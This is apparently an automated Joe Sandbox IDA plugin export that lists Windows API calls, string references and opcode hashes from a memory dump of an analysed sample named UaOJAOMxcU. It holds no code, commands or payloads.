                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                    • String ID:
                    • API String ID: 1504782959-0
                    APIs
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00458B61
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B73
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B89
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458BA4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    APIs
                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                    • DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                    • GetClientRect.USER32(?,?), ref: 0043B5FB
                    • GetCursorPos.USER32(?), ref: 0043B605
                    • ScreenToClient.USER32(?,?), ref: 0043B610
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Client$CursorLongProcRectScreenWindow
                    • String ID:
                    • API String ID: 4127811313-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 0048B2E4
                    • ScreenToClient.USER32(?,?), ref: 0048B2FC
                    • ScreenToClient.USER32(?,?), ref: 0048B320
                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B33B
                    Similarity
                    • API ID: ClientRectScreen$InvalidateWindow
                    • String ID:
                    • API String ID: 357397906-0
                    APIs
                    • EnterCriticalSection.KERNEL32(?), ref: 00466BE6
                      • Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9
                    • _memmove.LIBCMT ref: 00466C09
                    • _memset.LIBCMT ref: 00466C16
                    • LeaveCriticalSection.KERNEL32(?), ref: 00466C26
                    Similarity
                    • API ID: CriticalSection_memset$EnterLeave_memmove
                    • String ID:
                    • API String ID: 48991266-0
                    APIs
                    • GetSysColor.USER32(00000008), ref: 00402231
                    • SetTextColor.GDI32(?,000000FF), ref: 0040223B
                    • SetBkMode.GDI32(?,00000001), ref: 00402250
                    • GetStockObject.GDI32(00000005), ref: 00402258
                    • GetWindowDC.USER32(?,00000000), ref: 0043BE83
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0043BE90
                    • GetPixel.GDI32(00000000,?,00000000), ref: 0043BEA9
                    • GetPixel.GDI32(00000000,00000000,?), ref: 0043BEC2
                    • GetPixel.GDI32(00000000,?,?), ref: 0043BEE2
                    • ReleaseDC.USER32(?,00000000), ref: 0043BEED
                    Similarity
                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                    • String ID:
                    • API String ID: 1946975507-0
                    APIs
                    • GetCurrentThread.KERNEL32 ref: 0045871B
                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736
                    Similarity
                    • API ID: CurrentOpenProcessThreadToken
                    • String ID:
                    • API String ID: 3974789173-0
                    Strings
                    Similarity
                    • API ID:
                    • String ID: %I
                    • API String ID: 0-63094095
                    APIs
                    Strings
                    Similarity
                    • API ID: __itow_s
                    • String ID: xbL$xbL
                    • API String ID: 3653519197-3351732020
                    APIs
                      • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                    • __wcsnicmp.LIBCMT ref: 0046B02D
                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0046B0F6
                    Strings
                    Similarity
                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                    • String ID: LPT
                    • API String ID: 3222508074-1350329615
                    APIs
                    • Sleep.KERNEL32(00000000), ref: 00412968
                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981
                    Strings
                    Similarity
                    • API ID: GlobalMemorySleepStatus
                    • String ID: @
                    • API String ID: 2783356886-2766056989
                    APIs
                      • Part of subcall function 00404F0B: __fread_nolock.LIBCMT ref: 00404F29
                    • _wcscmp.LIBCMT ref: 00469824
                    • _wcscmp.LIBCMT ref: 00469837
                    Strings
                    Similarity
                    • API ID: _wcscmp$__fread_nolock
                    • String ID: FILE
                    • API String ID: 4029003684-3121273764
                    APIs
                    Strings
                    Similarity
                    • API ID: ClearVariant
                    • String ID: DdL$DdL
                    • API String ID: 1473721057-91670653
                    APIs
                    • _memset.LIBCMT ref: 0047259E
                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004725D4
                    Strings
                    Similarity
                    • API ID: CrackInternet_memset
                    • String ID: |
                    • API String ID: 1413715105-2343686810
                    APIs
                    • DestroyWindow.USER32(?,?,?,?), ref: 00486B17
                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486B53
                    Strings
                    Similarity
                    • API ID: Window$DestroyMove
                    • String ID: static
                    • API String ID: 2139405536-2160076837
                    APIs
                    • _memset.LIBCMT ref: 00462911
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046294C
                    Strings
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    APIs
                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00486761
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0048676C
                    Strings
                    Similarity
                    • API ID: MessageSend
                    • String ID: Combobox
                    • API String ID: 3850602802-2096851135
                    APIs
                      • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                      • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                      • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                    • GetWindowRect.USER32(00000000,?), ref: 00486C71
                    • GetSysColor.USER32(00000012), ref: 00486C8B
                    Strings
                    Similarity
                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                    • String ID: static
                    • API String ID: 1983116058-2160076837
                    APIs
                    • GetWindowTextLengthW.USER32(00000000), ref: 004869A2
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004869B1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: LengthMessageSendTextWindow
                    • String ID: edit
                    • API String ID: 2978978980-2167791130
                    • Opcode ID: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                    • Instruction ID: c4dc0b7ee3ea423f7e1eb401844c401eee0777dcbcb5b463cc5485c74a1bef4f
                    • Opcode Fuzzy Hash: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                    • Instruction Fuzzy Hash: A711B2B1100104ABEF506F68DC40EEF3769EB05378F614B29F964972E0C739DC919758
                    APIs
                    • _memset.LIBCMT ref: 00462A22
                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00462A41
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                    • Instruction ID: fa89ad59b694463807a05e008f151e0ce3f2ba89f6cc59c0a4ca2f54b8788f6f
                    • Opcode Fuzzy Hash: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                    • Instruction Fuzzy Hash: EA11B172A01915BACB30DA98DA44BDF73A8AB45304F044027E855B7290E7F8AD0AC79A
                    APIs
                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Internet$OpenOption
                    • String ID: <local>
                    • API String ID: 942729171-4266983199
                    • Opcode ID: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                    • Instruction ID: 87a968fd796eb7ebd351e14a87864fbf4782faaabfad8c695b3487e96fec79d3
                    • Opcode Fuzzy Hash: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                    • Instruction Fuzzy Hash: 2C113270101221BADB248F118D84EFBFBACFF0A351F10C66BF90892200D2B49881D6F9
                    APIs
                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                    • _wcscat.LIBCMT ref: 00444CB7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FullNamePath_memmove_wcscat
                    • String ID: SL
                    • API String ID: 257928180-181245872
                    • Opcode ID: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                    • Instruction ID: 43824745660c3988bd5ee8fabd2b32f2c8f8042702d18c831ff1fab54f9b3e1b
                    • Opcode Fuzzy Hash: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                    • Instruction Fuzzy Hash: ED118274A15208AACB40EB648945FDD77B8AF08354B0044ABB948E7291EAB8B6C4471D
                    APIs
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 9946c7197ab10ad9fde50dae1b7c0277909534bd518ba67c60e97b676ced7028
                    • Instruction ID: b8e2c670fbb7cccfe9550cd9997642be974785ccb83f9afd7f496d9e06e76b61
                    • Opcode Fuzzy Hash: 9946c7197ab10ad9fde50dae1b7c0277909534bd518ba67c60e97b676ced7028
                    • Instruction Fuzzy Hash: 4001F971601118ABCF14FBA1CC429FE7368EF01320B100A2FBC25772D2DE39580CC655
                    APIs
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: d0242bd35a47d84e43d9a51d6d7b20f2831aa5b35d47bc754fff3bab3a4422aa
                    • Instruction ID: f717951ca8db0a39ae808ededaa33f35f94e61068a96ac8ac9a889606be0a7e6
                    • Opcode Fuzzy Hash: d0242bd35a47d84e43d9a51d6d7b20f2831aa5b35d47bc754fff3bab3a4422aa
                    • Instruction Fuzzy Hash: 1701B1B1A41108ABCF14EBA1C952AFF73A8DF15341F10042FB805772D2DE285E0CD67A
                    APIs
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: ca68f18a7fa7c3bde14d10b92c765e559fdd9fc37852c13f41fffdb9c198d947
                    • Instruction ID: a21a4701c09283d063fe79b367182633aa51a9950eb7d0e2c1ab54a0e2954309
                    • Opcode Fuzzy Hash: ca68f18a7fa7c3bde14d10b92c765e559fdd9fc37852c13f41fffdb9c198d947
                    • Instruction Fuzzy Hash: 36018FB1A41109ABDB11EAA5C942AFF77A8DF11301F20052FBC05732D3DE295E1DD67A
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 0045C534
                      • Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
                      • Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
                      • Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C
                    • VariantClear.OLEAUT32(?), ref: 0045C556
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Variant$Init$ClearCopy_memmove
                    • String ID: d}K
                    • API String ID: 2932060187-3405784397
                    • Opcode ID: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                    • Instruction ID: 9b6b4eac42ae89553be157e2085c7612e92dc5081679660b2cee5bd476f3b436
                    • Opcode Fuzzy Hash: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                    • Instruction Fuzzy Hash: 401130B18007089FC710DFAAC8C089AF7F8FF18314B50852FE58AD7612E734AA48CB54
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp
                    • String ID: #32770
                    • API String ID: 2292705959-463685578
                    • Opcode ID: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                    • Instruction ID: c10ae28a8aa268df33283df1156ce4f732750d60ee08a51e76ed462bd539b068
                    • Opcode Fuzzy Hash: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                    • Instruction Fuzzy Hash: 91E0D13260023837E7209B55AC45FA7F7ACDB55B71F11006BFD04D3151D5649A45C7E5
                    APIs
                      • Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321
                      • Part of subcall function 00420940: InitializeCriticalSectionAndSpinCount.KERNEL32(004C4158,00000000,004C4144,0043B2F0,?,?,?,0040100A), ref: 00420945
                    • IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303
                    Strings
                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                    • API String ID: 3158253471-631824599
                    • Opcode ID: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                    • Instruction ID: 2b780658d3da49ad9f9e4503d56df9c93059da648c8d5ac8478d33f484e7c10e
                    • Opcode Fuzzy Hash: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                    • Instruction Fuzzy Hash: 02E06DB02007208BD720AF29E5047467AE4EF14308F00897EE856C7341EBB8E488CBA9